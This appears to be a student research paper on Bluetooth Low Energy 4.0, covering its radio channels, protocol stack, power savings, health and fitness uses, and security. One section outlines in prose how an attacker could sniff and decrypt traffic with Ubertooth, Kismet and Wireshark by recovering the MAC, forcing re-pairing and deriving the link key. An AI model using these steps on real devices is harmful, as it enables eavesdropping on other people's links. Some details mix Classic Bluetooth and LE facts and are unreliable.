Bluetooth Low Energy Version 4.

0
Helping create the internet of things
Julio Villegas

I. INTRODUCTION
More and more are we relying on our smart phone and tablet devices to connect to the
internet, stream audio on our car, and even in our home entertainment systems, and as we
extend the number of peripheral devices we connect to so will the need for more efficient
ways of doing so. Traditional Bluetooth has given us the ability to easily and quickly connect to
peripheral devices, but with the release of Bluetooth Low Energy v.4.0 (BLE) the types of
peripheral devices we connect to have spilled over to the medical and sports fields in
remarkable ways.
In this paper I will compare the advantages, disadvantages, security threats, energy efficiency,
transmission protocols, and transmission rates between BLE 4.0 with Classic Bluetooth. A
survey will be conducted on the performance and security of BLE along with the innovative
ways its being implemented in.

II. BLUETOOTH
A. Classic Bluetooth
Classic Bluetooth is used for short range wireless communication between devices in networks
where nodes can easily come and go. It uses 79 1MHz channels on the 2.4GHz ISM band with a
pseudo-random frequency hopping sequence. In a Piconet each Master device establishes the
frequency hopping sequence and can have up to 7 Slave connections. A device can be in more
than a single Piconet and overlapping Piconets are Scatternets. This paper focuses on
Bluetooth Low Energy, and since details on Classic Bluetooth have already been covered in
class, I will focus on describing BLE.

B. Bluetooth Low Energy (BLE)

BLE implements an entirely new protocol stack along with new profiles and applications. Its
core objective is to run for a very long time on a coin-cell battery. It also enables devices to
connect to the internet where traditionally they have not been able to in an efficient way through its client/server architecture. BLE is designed to be easy to develop for at a cheap
price.

Radio Frequency. Bluetooth LE operates in the 2.4GHz ISM band with only 40 channels
spaced 2MHz apart. It is capable of transmitting at a rate of 1Mbit/s using GFSK modulation.
Like Classic Bluetooth, it uses frequency hopping, but it uses adaptive frequency hopping and
at a slower rate. It uses 3 of the 40 channels to advertise which allow for device discovery.
After a device is discovered and connected the remaining 37 channels are used to transmit
data.

Figure 1: BLE uses 40 channels in the 2.4GHz ISM band. Channels in green are used for advertising.

Modes. For the most part, there are 4 basic modes a BLE device can operate in master
device mode, slave device mode, advertising mode, and scanning mode. Advertising mode is
used by the BLE device to periodically advertise information that can be used to establish a
link. It can also use this mode to respond to additional queries another device might make.
Scanning mode is used to capture advertise packets. Slave and Master Modes are used once a
link has been established between 2 devices, and its primary functions are to allow the devices
to read, write, and query each other. The device that starts out in Advertise Mode will assume
the Salve Device mode and conversely the device that is initially Scanning mode will assume
the Master Device mode.

Packet Format. There are 2 types of packets, Data and Advertise, each with variable
lengths. BLE Data packets consist of an 8bit preamble, 32bit access codes that are defined by
the RF channel used, a variable PDU ranging from 2-39bytes and a 24bit CRC. This means the
shortest packet can be as small as 80bits or as long as 376bits. It also means a transmission
time can range of 80microseconds to 0.3milliseconds. Advertise packets on the other hand,
have PDU containing a 16bit header and up to 31bytes of data.

Figure 2: Bluetooth 4.0 Data packet format.

Pairing Process. Theres threes way two devices associate, Just Works, Out of Band, and
Passkey Entry. An advertising device transmits packets on the advertise channels with a PDU
containing the device address and up to 31bytes of additional information. A scanning device
is able to see the address and depending on the advertiser, additional information may be sent
upon request. What this means is that a good amount of information can be obtained about
the device without even establishing a connection. Advertising is done sequentially on all
available channels at a rate from 20ms to every 10seconds depending on configuration. A
scanner device on the other hand is configured with a scan window (how long to look) and a
scan interval (how often in between scans). Once a connection is made, the scanner will supply
the advertiser with 2 critical pieces of information connection interval and slave latency.
Connection interval is used to determine the start time of connection events. A connection
event is a simply the exchange sequence of data packets. The other parameter, Slave Latency
is the amount of connection intervals a slave can ignore without losing the connection; this is
done to optimize power consumption.

Data Exchange. After a link is established communication is carried out over the 37
channels. The PDUs have up to 37bytes of payload, along with a packet header, and a
Message Integrity Check of 4bytes. A communication event is initiated by a Master device with
communication alternating between master/slave until one of them stops transmitting.

BLE Protocol Stack. The BLE protocol stack is partitioned into a Controller and a Host.
The Controller handles the lower layers of the stack responsible for capturing physical packets
and the RF used by the radio. The Host handles the upper layers of the stack; they include the
application, attribute protocol, and L2CAP. The Host and Controller can be either collocated or

the Host can run in the application processor with the application. In the second option, a
hardware Controller Interface (HCI) is used by the Controller and Host to communicate.

Figure 3: BLE protocol stack.

i. Controller. The link layer controller captures the physical packets in the air band; it also
manages timing and the queue of incoming and outgoing packets. In short, its
responsible for the physical level data flow. This component can also be used as a
firewall to the device by filtering packets from specific devices.
ii. L2CAP. The controller communicates with the Logical Link Control and Adaptation
Layer (L2CAP) protocol via the HCI or directly if collocated. The main function of this
component is to provide data services to the upper level layers and for multiplexing
and segmenting packets into fragments for the controller. Conversely, it is reassembles
packets from the controller before they are routed to the upper level layers.
iii. GAP. The Generic Access Profile (GAP) is responsible for defining generic procedures
that are used in the pairing and linking of the device. Its the interface for the
application layer to implement the different Bluetooth modes (Advertising, Scanning,
etc.)
iv. SM. The Security Manager (SM) is used for authentication and encryption. It uses AES128 bit encryption engine to do so and is also responsible for pairing and key

distribution. This component is used by the Master device to ease the computing
demands of security on the Slave device.
v. ATT. The Attribute protocol is a communication method designed to optimize
transmission of small packets. ATT are pairs of attributes and values that can be used to
read, write, or discover by other devices.
vi. GATT. Another component is the Generic Attribute Profile (GATT) it is responsible for
describing the different service frameworks and is an extension to ATT that is specific
to Bluetooth LE4.0. It interfaces with the application layer through the application
profiles. Each application profile defines data formatting and how it should be
interpreted by the application. Profiles improve on power efficiency by reducing the
amount of data being exchanged. They are designed for specific functionality, for
example theres a Heart Rate profile, Glucose profile, and Alert Notification profile
among dozens and dozens of others. This makes it easy for developers to create
applications aimed at specific functionality using the predefined attributes/value pairs
found in each profile.

Low Energy. Theres a few ways Bluetooth 4.0 achieves its increased power efficiency.
First, it uses a lower duty cycle, this means it goes to sleep for longer periods of time and
wakes up less frequently to send or receive packets. Second, using the GATT profiles it is
able to send smaller data packets (expose state) in short bursts to save on power. Data
transmission can be triggered by a local event and is available for a client to access at any
time. Lastly, it doesnt maintain links with devices whenever its not communicating; the
device goes to sleep and ends the link once the exchange is complete. A link is rapidly reestablished upon the next communication exchange.
So how much less power does BLE consume than classic Bluetooth? It depends on the
device and implementation, but generally we can see (Figure 4) that the transmit time is
much shorter from classic Bluetooths 100ms to BLEs 3ms. We can also see that the peak
current consumption is 10mA less and in best case scenarios power consumption is 1/100 th
than that of classic Bluetooth.

C. Bluetooth Classic vs. Bluetooth Low Energy

With BLE, Bluetooth has made a paradigm shift in design. Bluetooth 2.0 EDR and Bluetooth 3.0
HS were designed with faster data rates in mind, I contrast BLE 4.0 was designed with lower
power consumption in mind. BLE 4.0 is not designed to stream large amounts of data; it is
designed to periodically send short bursts of data. There are 2 types of BLE4.0 devices, dual
mode which is backwards compatible with previous BT versions, and single mode which only
supports BLE4.0. Dual mode devices that perform high data rate streaming do not benefit from
the low power consumption of BLE4.0, which is only accomplished when BLE low data rate
mode is used. Figure 4 illustrates the technical details of each and makes it clear to see that it
is not a question about which is better, but which is better suited for the specific application.
BLE 4.0 is not intended to completely replace previous versions, it can if it makes sense, but for
a large part it is opened the door for new implementations of Bluetooth.

Figure 4: Technical comparison of classic Bluetooth and BLE

III. BLUETOOTH LE 4.0 USES

Bluetooth LE achieves a few new features through its implementation. First, the obvious
lowered power consumption gained by very low peak, average, and idle mode power
consumption. Second, it is able to run a device for years on a standard coin-cell battery making
maintenance easy. Third, it has a very low cost since most devices come with Bluetooth already
available. Fourth, any device bearing the Bluetooth logo has complete interoperability with
each other, independent of the vendor.

The characteristics of BLE make it a suitable candidate for small devices that need to maintain a
fairly dependable communication link to other devices or a larger network. What type of small
devices? Well they can range from pedometers, blood pressures, and pulse rates, to watches
and tags. These devices can in turn connect to local devices with internet access making this
data available anywhere. For example, a pedometer can send distance data to a persons cell
phone which can then be sent to the internet via the 4G connection the phone has. Devices
bearing the Bluetooth SMART or Bluetooth SMART READY logo are BLE 4.0 capable. Some ways
they are being used include the following.
Smart Energy
These can be meters, gauges, or displays found around the home or office. Data from these
devices can be tracked and monitored from anywhere by having them transmit to a local device
with internet connectivity. They can also be paired with a persons watch so that temperature
setting or lights are adjusted whenever a particular person is in a room. It not only makes life
easier it also makes smarter use of energy consumption.
Health & Wellness
Some devices bearing the BLE Logo include heart rate and glucose monitors. Combined with a
centralized application they can be used for assisted living. For example, right now there are
devices that continually monitor a diabetic persons sugar level, but they simply set off a

beeping sound whenever those sugar levels spike. With BLE, that device can be set up to send
those sugar levels to a centralized application on the internet that monitors for any dangerous
irregularities. Emergency personnel can be dispatched to help whenever a persons vitals fall
within a certain range.
Sports & Fitness
When it comes to sports and fitness the focus is on tracking vitals and location. There are
several sports heart rate monitors on the market that track an athletes vitals throughout their
workout. Tracking these vitals also helps athletes reach optimal heart rate conditions to
maximize their workout. Another implementation is on an athletic shoe to track, quickness,
vertical jump, and calories burned. When it comes to location, several Garmin devices use BLE
to connect to a users cell phone and transmit location data back and forth. This could include
exchanging maps, trails, and current location with other people.

IV.BLUETOOTH SECURITY
A. Security Features
Theres several ways security is built into BLE. To start, frequency hopping makes it difficult for
an Attacker to sniff data going across the air since the devices are constantly changing the
channel they communicate on. There are also 3 discoverable modes, in Discoverable Mode a
device can respond to any and all pairing queries, in Limited Discoverable the device is only in
Discoverable Mode long enough for a device to pair up with it then goes back to NonDiscoverable Mode. In Non-Discoverable mode the device never responds to a pairing query.
Another form of security is the Bluetooth address; it is used to determine the hopping
frequency and timing of paired devices. Only a portion of the address is included in
transmission packets, so an Attacker eavesdropping would have a hard time finding the
hopping frequency without the entire address contained in the sniffed packet. Security Modes
add encryption to BLE. Under Mode 1 no security is implemented, in Mode 2 encryption is
implemented at the software level once a link is established. Mode 3 establishes security at
the hardware level which is before the link is established. Encryption in BLE is done using 128-

bit AES which has shown to be unfeasible to crack using a brute force attack. Finally, a device
can require a PIN or a Paraphrase at the time of establishing a connection to establish the
pairing.

B. Sniffing Vulnerabilities
With all the security features built into BLE it seems a user could simply make their device
Non-Discoverable, use Mode 3 security, and require a complex paraphrase to establish the
pairing (when the device allows for custom paraphrases). There is however one glaring
security hole in the pairing process. The initial request to pair with a device is not encrypted
and those packets can be captured by an Attacker thats eavesdropping on the network. They
can be used to determine the link key and then either eavesdrop, insert legitimate looking
packets, or both. It is important to note that once the 2 devices are paired, any subsequent
pairing and authentication is done using the negotiated link key. This means the heart of the
problem resides where the 2 devices pair for the first time or when they have to re-establish a
link key.

C. Implementing a Sniffing Attack

There are several industry tools like Frontlines ComProbe FTS4BT protocol analyzer and packet
sniffer that are made for developers to test their applications for security and performance.
They can also be used in malicious ways to eavesdrop on connections, but like other industry
tools they can be very expensive and not be worth the trouble. Another option is to build such
a device from scratch. There are four major obstacles an Attacker has to overcome to
successfully implement a sniffing attack. First, the Attacker needs to be able to listen on the
channel in promiscuous mode to capture all traffic. Second, the packets need to be
unscrambled to make sense of its contents. Third, the Attacker needs to figure out the
Bluetooth devices MAC address since that along with the clock is used to calculate the
hopping sequence. Finally, the Attacker needs to force the 2 devices to re-pair and establish a
new link key. The following paragraphs will describe one way it can be done.

Bluetooth packets can be picked up from the air band using a passive Bluetooth device
such as Ubertooth. This is an open source piece of hardware that can be purchased fully
functional for around $100 online or built from scratch for around $35(do-it-yourself). The
blueprint to build one can be found on the Ubertooth website. Ubertooth uses a radio with the
same modulation scheme as Bluetooth which enables it to both pick up packets from the air
band and also insert new packets. Sniffed packets are parsed to extract the LAP portion of the
MAC address using Ubertooths firmware.

Figure 5: LAP portion of the MAC can be extracted from sniffed packet using Ubertooth.

Once we have captured some Bluetooth packets, we can use a Kismet plug-in to further
examine the contents. Kismet is an 802.11 network monitoring tool with sniffing capabilities.
Using this tool, we can analyze multiple packet characteristics such as timing to determine the
UAP portion of the MAC. Kismet can create a pcapbtbb file containing completely decoded
packets that Wireshark can read using a plug-in that is distributed with libtbb. Using Wireshark
we can completely dissect packets once we have the link key.

Figure 6: UAP can be extracted by examining packets further using Kismet.

The final step in determining the complete MAC is finding what the NAP portion is. One way of
doing that is through elimination. The first 8bits are almost always 0. The last 8bits are vendor
specific and a list of them can be found on the Organizationally Unique Identifier (OUI) list. In
addition, MACs are also device specific, therefore it can narrow the list of candidates down
even further. Finally a brute force attack can be applied to the remaining candidates by
sending a connection request to the device using each guessed MAC.

Figure 7: Breakdown of the three parts of MAC address

By having knowledge of the entire MAC address, we can determine the hopping sequence.
Now we can try to make the 2 devices re-pair with each other by injecting pairing request
packets in order to convince one of them the other has lost the link key. If this works and the
re-pairing process is initiated, we can capture all the packets in the pairing sequence now that
we know the hopping pattern. With the complete set of pairing packets in hand, we can
compute the link key and use it to decrypt sniffed packets and encrypt packets to inject into
the link. A successful implementation of this attack would affect even devices in NonDiscoverable mode since we have knowledge of the MAC and can communicate directly with
the device without having it broadcast its own MAC.

V. CONCLUSION/WHAT I LEARNED
Doing this research paper helped me better understand Bluetooth in general. I took an in depth
look at the protocol stack to learn how each component works and how it interacts with the
rest of the protocol stack. I also found several implementations of BLE in ways I was unfamiliar
with and got me to start thinking on what other ways I could potentially use this for. I feel
better prepared to create a tablet/smart phone app that takes advantage of the BLE application
profiles now that I know how they work. Lastly, I did thorough investigation on the existing
tools and techniques used to sniff Bluetooth traffic. I understand the differences in the tools
and what each of those tools does to exploit the Bluetooth protocol. Now, my understanding of
those exploits goes beyond simply running the tool, I know what is happening on the backend
to make it all happen. Bluetooth 4.0 is a highly secure protocol and the vulnerability should not
deter anyone from developing applications that use it, since executing a successful attack is
extremely difficult and impractical.
My project presentation can be found at: http://youtu.be/O8h6T7g25jE

References
1. Taming the Blue Beast A Survey of Bluetooth-Based threats , March/April 2010;
http://home.engineering.iastate.edu/~gamari/CprE537_S13/docs/BluetoothSec.pdf.
2. http://ubertooth.sourceforge.net/
3. Dominic Spill and Andrea Bittau, Bluesniff: Eve meets Alice and Bluetooth;
http://static.usenix.org/event/woot07/tech/full_papers/spill/spill.pdf.
4. FTS4BT Bluetooth Protocol Analyzer and Packet Sniffer, product data sheet, Frontline
Test Equipment, 2010; www.fte.com/products/FTS4BT.aspx.
5. Kismet Site, http://www.kismetwireless.net/
6. Bluetooth Special Interest Group Site, specification | Adopted Documents,
https://www.bluetooth.org/en-us/specification/adopted-specifications
7. Joe Decuir, Changing the Way the World Connects - Bluetooth 4.0: Low Energy, 2010;
http://chapters.comsoc.org/vancouver/BTLER3.pdf

8. Mikhail Galeev, Bluetooth 4.0: An Introduction to Bluetooth Low Energy, July 2011;
http://www.eetimes.com/design/communications-design/4217866/Bluetooth-4-0--Anintroduction-to-Bluetooth-Low-Energy-Part-I
9. A. Becker, Bluetooth Security & Hacks, unpublished paper, 16 Aug. 2007;
http://gsyc.es/~anto/ubicuos2/ bluetooth_security_and_hacks.pdf.